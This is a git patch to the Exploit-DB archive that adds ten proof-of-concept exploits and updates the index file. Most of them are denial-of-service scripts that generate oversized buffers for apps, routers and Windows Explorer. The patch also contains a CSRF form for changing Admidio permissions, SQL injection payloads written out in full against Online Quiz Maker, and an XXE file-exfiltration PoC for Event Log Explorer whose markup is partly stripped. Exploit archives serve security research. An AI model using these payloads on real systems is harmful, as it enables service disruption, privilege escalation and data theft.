From 925b2171f44d7542db57c82ba7d5613311d3bf83 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 4 Sep 2018 05:01:55 +0000 Subject: [PATCH] DB: 2018-09-04 10 changes to exploits/shellcodes VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC) Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC) D-Link DIR-615 - Denial of Service (PoC) Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC) Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC) Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC) Wikipedia 12.0 - Denial of Service (PoC) Argus Surveillance DVR 4.0.0.0 - Directory Traversal Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting Argus Surveillance DVR 4.0.0.0 - Directory Traversal Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting Vox TG790 ADSL Router - Cross-Site Scripting WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting Vox TG790 ADSL Router - Cross-Site Scripting FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions) Online Quiz Maker 1.0 - 'catid' SQL Injection --- exploits/hardware/dos/45317.txt | 19 +++++++ exploits/ios/dos/45318.py | 26 ++++++++++ exploits/ios/dos/45321.py | 21 ++++++++ exploits/php/webapps/45322.txt | 51 ++++++++++++++++++ exploits/php/webapps/45323.txt | 77 ++++++++++++++++++++++++++++ exploits/windows/dos/45315.py | 26 ++++++++++ exploits/windows/dos/45320.py | 45 ++++++++++++++++ exploits/windows/dos/45324.py | 25 +++++++++ exploits/windows/webapps/45319.txt | 23 +++++++++ exploits/windows_x86-64/dos/45316.py | 29 +++++++++++ files_exploits.csv | 22 +++++--- 11 files changed, 358 insertions(+), 6 deletions(-) create mode 100644 exploits/hardware/dos/45317.txt create mode 100755 exploits/ios/dos/45318.py create mode 100755 exploits/ios/dos/45321.py create mode 100644 exploits/php/webapps/45322.txt create mode 100644 exploits/php/webapps/45323.txt create mode 100755 exploits/windows/dos/45315.py create mode 100755 exploits/windows/dos/45320.py create mode 100755 exploits/windows/dos/45324.py create mode 100644 exploits/windows/webapps/45319.txt create mode 100755 exploits/windows_x86-64/dos/45316.py diff --git a/exploits/hardware/dos/45317.txt b/exploits/hardware/dos/45317.txt new file mode 100644 index 000000000..19d02d712 --- /dev/null +++ b/exploits/hardware/dos/45317.txt @@ -0,0 +1,19 @@ +# Exploit Title: D-Link DIR-615 - Denial of Service (PoC) +# Date: 2018-08-09 +# Vendor Homepage: http://www.dlink.co.in +# Hardware Link: https://www.amazon.in/D-Link-DIR-615-Wireless-N300-Router-Black/dp/B0085IATT6 +# Version: D-Link DIR-615 +# Category: Hardware +# Exploit Author: Aniket Dinda +# Tested on: Linux (kali linux) +# Web: https://hackingvila.wordpress.com/2018/08/24/d-link-dir-615-buffer-overflow-via-a-long-authorization-http-header-click-here/ +# Cve: CVE-2018-15839 + +# Proof Of Concept: + +1- First connect to this network +2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser. +3- Goto Easy setup > +4- Now as the Burp is intercept is on, you will find an Authorization: Basic or cookie: SessionId followed by a string. Now we paste a string consisting oaf 5000 zeros. +5- Then forward the connection +6- Then your router automatically log out and the net connection will be gone. \ No newline at end of file diff --git a/exploits/ios/dos/45318.py b/exploits/ios/dos/45318.py new file mode 100755 index 000000000..34f9a4f55 --- /dev/null +++ b/exploits/ios/dos/45318.py @@ -0,0 +1,26 @@ +# Exploit Title: Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2018-09-02 +# Vendor Homepage: https://www.symantec.com/ +# Software Link: https://itunes.apple.com/mx/app/symantec-mobile-encryption/id450235714?mt=8 +# Tested Version: 2.1.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: iPhone 7 iOS 11.4.1 + +# Steps to Produce the Crash: +# 1.- Run python code: Symantec_Mobile_Encryption_2.1.0.py +# 2.- Copy content to clipboard +# 3.- Open App Symantec Mobile Encryption for iPhone +# 4.- User License -> Accept +# 5.- Instructions -> Setup +# 6.- Paste ClipBoard on "Server" +# 7.- User -> admin +# 8.- Password -> admin +# 9.- Next +# 10.- Network Settings -> Next +# 11.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 1907 +print (buffer) \ No newline at end of file diff --git a/exploits/ios/dos/45321.py b/exploits/ios/dos/45321.py new file mode 100755 index 000000000..46a21b154 --- /dev/null +++ b/exploits/ios/dos/45321.py @@ -0,0 +1,21 @@ +# Exploit Title: Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2018-09-01 +# Vendor Homepage: http://www.trendmicro.com.tr/media/ds/virtual-mobile-infrastructure-datasheet-en.pdf +# Software Link: App Store for iOS devices +# Tested Version: 5.5.1336 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: iPhone 7 iOS 11.4.1 + +# Steps to Produce the Crash: +# 1.- Run python code: Virtual_Mobile_Infrastructure_5.5.1336.py +# 2.- Copy content to clipboard +# 3.- Open App Vitual Mobile Infrastructure +# 4.- Paste ClipBoard on "Server address" +# 5.- Next +# 6.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 15000 +print (buffer) \ No newline at end of file diff --git a/exploits/php/webapps/45322.txt b/exploits/php/webapps/45322.txt new file mode 100644 index 000000000..1a597d9f7 --- /dev/null +++ b/exploits/php/webapps/45322.txt @@ -0,0 +1,51 @@ +# Exploit Title: Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions) +# Author: Nawaf Alkeraithe +# Date: 2018-09-01 +# Vendor Homepage: https://www.admidio.org/ +# Software Link: https://sourceforge.net/projects/admidio/files/Admidio/3.3.x/admidio-3.3.5.zip/download +# Version: 3.3.5 +# Tested on: PHP +# CVE: N/A + +# Description: +# Low Privilage users are able to increase their permissions due to improper origin checking +# by the vendor. + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
rol_name
rol_description
rol_cat_id
rol_mail_this_role
rol_this_list_view
rol_leader_rights
rol_lst_id
rol_default_registration
rol_max_members
rol_cost
rol_cost_period
rol_assign_roles
rol_all_lists_view
rol_approve_users
rol_edit_user
rol_mail_to_all
rol_profile
rol_announcements
rol_dates
rol_photo
rol_download
rol_guestbook
rol_guestbook_comments
rol_weblinks
rol_start_date
rol_end_date
rol_start_time
rol_end_time
rol_weekday
rol_location
btn_save
+ +
+ \ No newline at end of file diff --git a/exploits/php/webapps/45323.txt b/exploits/php/webapps/45323.txt new file mode 100644 index 000000000..c2093d56a --- /dev/null +++ b/exploits/php/webapps/45323.txt @@ -0,0 +1,77 @@ +# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection +# Dork: N/A +# Date: 2018-09-03 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php +# Software Link:https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux + +# Description : An attacker can execute SQL commands through parameters +# that contain vulnerable. +# An authorized user can use the filtering feature and can fully authorize +# the database or other server informations. Also there are XSS +# vulnerabilities too. + +# PoC : SQLi 1 : +# Request(POST): + +POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1 +Host: www.hscripts.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 18 +uname=test&catid=1 + +# Parameter: catid (POST) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: + +uname=test&catid=1 AND 4815=4815 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: + +uname=test&catid=1 AND SLEEP(5) + +# Type: UNION query +# Title: Generic UNION query (NULL) - 10 columns +# Payload: + +uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR + +# PoC : SQLi 2: Admin Login SQL Injection +# Request(POST): + +POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1 +Host: www.hscripts.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: +https://www.hscripts.com/scripts/php/quiz-system/admin/add-category.php +Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 38 +usern=testing&passw=password&type=auth + +# Parameter: usern (POST) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: + +usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth \ No newline at end of file diff --git a/exploits/windows/dos/45315.py b/exploits/windows/dos/45315.py new file mode 100755 index 000000000..d61f177ad --- /dev/null +++ b/exploits/windows/dos/45315.py @@ -0,0 +1,26 @@ +# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC) +# Discovery by: Diego Santamaria +# Discovery Date: 2018-08-31 +# Vendor Homepage: https:https://www.visionistech.com/en/home/ +# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/ +# Tested Version: V2.6.2.70 build20171226_053 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 7 Professional + +# Steps to Reproduce: + +# 1. Run the python code Nickname.py +# 2. Open nickname_exploit.txt and copy the content +# 3. Open VSAXESS.exe +# 4. Register a password and username +# 5. choose 'Add' +# 6. choose 'Serial Port' +# 6. Paste the content from nickname_exploit.txt on 'Nickname' +# 7. Press 'Aceptar' and Crashed + +#!/usr/bin/env python + +content = "\x41" * 9300 +f = open ("nickname_exploit.txt", "w") +f.write(content) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/45320.py b/exploits/windows/dos/45320.py new file mode 100755 index 000000000..4f6dc49ce --- /dev/null +++ b/exploits/windows/dos/45320.py @@ -0,0 +1,45 @@ +# Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC) +# Date: 2018-09-01 +# Exploit Author: Ghaaf +# Vendor Homepage: http://www.microsoft.com +# Version: Windows 7(x86/x64) +# Tested on: 6.1.7601 Service Pack 1 Build 7601 +# CVE: N/A + +buffer = '' +buffer += "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00" +buffer += "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00" +buffer += "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68" +buffer += "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F" +buffer += "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20" +buffer += "\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88" +buffer += "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88" +buffer += "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00" +buffer += "\xE8\x2D\x73\x54\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x0F\x01" +buffer += "\x0B\x01\x06\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00" +buffer += "\x68\x11\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00" +buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00" +buffer += "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x10\x00\x00" +buffer += "\xB2\xEA\x00\x00\x02\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00" +buffer += "\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x94\x1A\x00\x00\x28\x00\x00\x00" +buffer += "\x00\x30\x00\x00\xA4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x28\x02\x00\x00\x20\x00\x00\x00" +buffer += "\x00\x10\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x2E\x74\x65\x78\x74\x00\x00\x00\x38\x0D\x00\x00\x00\x10\x00\x00" +buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x64\x61\x74\x61\x00\x00\x00" +buffer += "\xE0\x09\x00\x00\x00\x20\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00" +buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0" +buffer += "\x2E\x72\x73\x72\x63\x00\x00\x00\xA4\x08\x00\x00\x00\x30\x00\x00" +buffer += "\x00\x10\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +buffer += "\x00\x00\x00\x00\x40\x00\x00\x40\x6C\xDA\x5B\x4A\x10\x00\x00\x00" +open("poc.exe", "wb").write(buffer) \ No newline at end of file diff --git a/exploits/windows/dos/45324.py b/exploits/windows/dos/45324.py new file mode 100755 index 000000000..b747dc230 --- /dev/null +++ b/exploits/windows/dos/45324.py @@ -0,0 +1,25 @@ +# Exploit Title: Wikipedia 12.0 - Denial of Service (PoC) +# Date: 9/2/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://www.microsoft.com/en-us/p/wikipedia/9wzdncrfhwm4?activetab=pivot%3aoverviewtab +# Version: 12.0 +# Tested on: Windows 10 + +# Proof of Concept: +# Run the python script, it will create a new file "wiki.txt" +# Copy the text from the generated wiki.txt file to clipboard +# Paste the text in the search bar in the top right of app +# App will now crash + +buffer = "A" * 1000 +payload = buffer +try: + f=open("wiki.txt","w") + print "[+] Creating %s evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/webapps/45319.txt b/exploits/windows/webapps/45319.txt new file mode 100644 index 000000000..955660748 --- /dev/null +++ b/exploits/windows/webapps/45319.txt @@ -0,0 +1,23 @@ +# Title: FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection +# Author: hyp3rlinx +# Date: 2018-09-01 +# Vendor: www.eventlogxp.com +# Software: https://eventlogxp.com/download.php +# Affected Component: elex.exe +# CVE: N/A + +# Description: +# Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers +# can potentially gain access to local files. + +# PoC +python -m SimpleHTTPServer + +"test.elx" + + + + +%dtd;]> +&send; \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45316.py b/exploits/windows_x86-64/dos/45316.py new file mode 100755 index 000000000..a85628da8 --- /dev/null +++ b/exploits/windows_x86-64/dos/45316.py @@ -0,0 +1,29 @@ +# Exploit Title: Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC) +# Date: 2018-08-30 +# Exploit Author: Uriel Corral Salinas +# Vendor Homepage: http://www.itlights.com +# Software Link: http://www.scanwith.com/download/Free_Visual_Ping.htm +# Version: Free Visual Ping (Version 0.8.0.0) +# Tested on: Windows 10 Pro x64 + +# Visual Ping 0.8.0.0 - 'Host, Time Out,packet size, Pause, Loops' - Denial of Service (PoC) +# 1. Ejecutar codigo "Visual_Ping.py" +# 2. Copiar contenido de "VisualPing.txt" al portapapeles +# 3. Ejecutar VPing.exe +# 4. Copiar portapapeles en Host +# 5. Copiar portapapeles en Time Out +# 6. Copiar portapapeles en Packet size +# 7. Copiar portapapeles en Pause +# 8. Copiar portapapeles en Loops +# 9. Click en Star +# 10. Crashed + +#!/usr/bin/env python + +f=open("VisualPing.txt","w") +buff = "\x41" * 4108 +ggg = "\x42" * 4 +hhh = "\x43" * 4 +iii = "\x44" * 4 +f.write(buff + ggg + hhh + iii) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d0d63efd2..8ee52bc96 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6087,6 +6087,13 @@ id,file,description,date,author,type,platform,port 45302,exploits/windows_x86-64/dos/45302.py,"NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)",2018-08-30,"Victor Mondragón",dos,windows_x86-64, 45304,exploits/windows_x86-64/dos/45304.py,"Nord VPN 6.14.31 - Denial of Service (PoC)",2018-08-30,L0RD,dos,windows_x86-64, 45311,exploits/windows_x86-64/dos/45311.py,"Acunetix WVS Reporter 10.0 - Denial of Service (PoC)",2018-08-31,"Ali Alipour",dos,windows_x86-64, +45315,exploits/windows/dos/45315.py,"VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC)",2018-09-03,"Diego Santamaria",dos,windows, +45316,exploits/windows_x86-64/dos/45316.py,"Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC)",2018-09-03,"Uriel Corral Salinas",dos,windows_x86-64, +45317,exploits/hardware/dos/45317.txt,"D-Link DIR-615 - Denial of Service (PoC)",2018-09-03,"Aniket Dinda",dos,hardware, +45318,exploits/ios/dos/45318.py,"Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios, +45320,exploits/windows/dos/45320.py,"Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC)",2018-09-03,Ghaaf,dos,windows, +45321,exploits/ios/dos/45321.py,"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios, +45324,exploits/windows/dos/45324.py,"Wikipedia 12.0 - Denial of Service (PoC)",2018-09-03,0xB9,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -39899,11 +39906,14 @@ id,file,description,date,author,type,platform,port 45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80 45284,exploits/php/webapps/45284.txt,"phpMyAdmin 4.7.x - Cross-Site Request Forgery",2018-08-29,VulnSpy,webapps,php,80 45286,exploits/hardware/webapps/45286.py,"Episerver 7 patch 4 - XML External Entity Injection",2018-08-29,"Jonas Lejon",webapps,hardware, -45296,exploits/windows_x86/webapps/45296.txt,"Argus Surveillance DVR 4.0.0.0 - Directory Traversal",2018-08-29,hyp3rlinx,webapps,windows_x86, -45303,exploits/windows_x86-64/webapps/45303.txt,"Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64, -45305,exploits/php/webapps/45305.txt,"WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php, +45296,exploits/windows_x86/webapps/45296.txt,"Argus Surveillance DVR 4.0.0.0 - Directory Traversal",2018-08-29,hyp3rlinx,webapps,windows_x86,8080 +45303,exploits/windows_x86-64/webapps/45303.txt,"Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,443 +45305,exploits/php/webapps/45305.txt,"WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,80 45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware, -45307,exploits/php/webapps/45307.txt,"WordPress Plugin Quizlord 2.0 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php, -45309,exploits/windows_x86-64/webapps/45309.txt,"Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64, -45310,exploits/hardware/webapps/45310.txt,"Vox TG790 ADSL Router - Cross-Site Scripting",2018-08-31,cakes,webapps,hardware, +45307,exploits/php/webapps/45307.txt,"WordPress Plugin Quizlord 2.0 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,80 +45309,exploits/windows_x86-64/webapps/45309.txt,"Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,80 +45310,exploits/hardware/webapps/45310.txt,"Vox TG790 ADSL Router - Cross-Site Scripting",2018-08-31,cakes,webapps,hardware,443 45314,exploits/php/webapps/45314.txt,"DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)",2018-08-31,Autism_JH,webapps,php, +45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows, +45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80 +45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,